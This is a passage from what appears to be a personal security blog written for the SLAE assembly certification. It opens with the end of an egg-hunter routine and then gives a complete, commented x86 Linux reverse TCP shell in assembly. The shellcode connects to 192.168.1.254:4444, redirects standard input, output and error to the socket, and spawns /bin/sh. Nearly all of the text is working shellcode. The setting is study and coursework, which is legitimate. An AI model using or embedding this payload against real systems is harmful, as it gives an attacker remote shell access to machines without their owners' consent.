    cmp al, 0xf2; because it's not a file

    jz get_memory_block ; if is not, loop

    mov eax, 0x50905090 ; egg here in little endiant
    mov edi, edx
    
    scasd; compare next 4 bytes and edi+4 
    jnz checker ; return and search

    scasd; compare next 4 bytes and edi+4 
    jnz checker ; return and search

    jmp edi; if we here == we found the eggs, jump to our shellcode :)

SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:


viernes, 2 de mayo de 2014

[SLAE] II Reverse TCP shell

Source: SecurityTube


Source: TutorialsPoint

Ok, to implement reverse tcp shell is a bit easy then bind shell, because all what we need is a configure socket and do the connection to our server/listener. In the image above sees TCP Client we only need socket() and connect(), information about details from witch parameters need to be setup, check TutorialPoint manual. I tried to comment all lines in code witch need explication, so code is auto explained, I hope so :D

For compilation please check this script 


;coded by SLAE - 513 - Andriy Brukhovetskyy
;syscall numbers can be found here /usr/include/asm/unistd_32.h
;socketcall man - http://www.tutorialspoint.com/unix_sockets/socket_core_functions.htm
;socket families definitions can be locked here: /usr/src//include/linux/socket
;or we can use python socket modude - example socket.AF_INET
;Values needed to configure socket can be found here:
;/usr/include/linux/net.h
;96 bytes lenght

global _start
section .text

_start:
        ;int socket (int family, int type, int protocol);
        xor eax, eax
        mov al, 102   ; socketcall
        xor ebx, ebx
        mov bl, 1     ; 1 = SYS_SOCKET socket()
        xor ecx, ecx
        push ecx      ; putting 0
        push BYTE 6   ; IPPROTO_TCP - int protocol
        push BYTE 1   ; SOCK_STREAM - int type
        push BYTE 2   ; AF_INET     - int domain
        mov ecx, esp  ; ECX - PTR to arguments for socket()
        int 0x80

        mov esi, eax  ; save socket fd in ESI for later
        
        ;int connect(int sockfd, struct sockaddr *serv_addr, int addrlen);
        xor eax, eax
        mov al, 102 ; socketcall
        xor ebx, ebx
        mov bl, 3   ; 3 = sys_connect()
        xor edx, edx
        
        push dword 0xfe01a8c0; ip 192.168.1.254 little endiant!
        push word 0x5c11     ; port 4444 little endiant!
        
        dec ebx       ; ebx now is 2
        push word bx  ; 2 - AF_INET
        inc ebx       ; 3
        mov ecx, esp  ; ptr to struct sockaddr
        push byte 16  ; socklen_t addrlen
        push ecx      ; struct sockaddr *addr
        push esi      ; int sockfd
        mov ecx, esp  ; ECX = PTR to arguments for connect()
        int 0x80      ; sockfd will be in EBX
        
        mov eax, ebx ; sockfd
        push BYTE 3  ; count for dup2
        pop ecx      ; get count
          
        ;forwaring STDIN/STDOUT/STDERR
dup2_loop:
        dec ecx
        mov BYTE al, 63; dup2 syscall number
        int 0x80
        jnz dup2_loop ; jump if not 0
        
        ; spawning as shell
        xor eax, eax
        mov al, 11 ; execve syscall
        xor edx, edx
        push edx
        ; '/bin//sh'[::-1] <- reverse mode
        push 0x68732f2f ; hs//
        push 0x6e69622f ; nib/
        mov ebx, esp
        push edx
        push ebx
        mov ecx, esp    ; ESP is now pointing to EDX
        push edx
        mov edx, esp
        int 0x80

SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: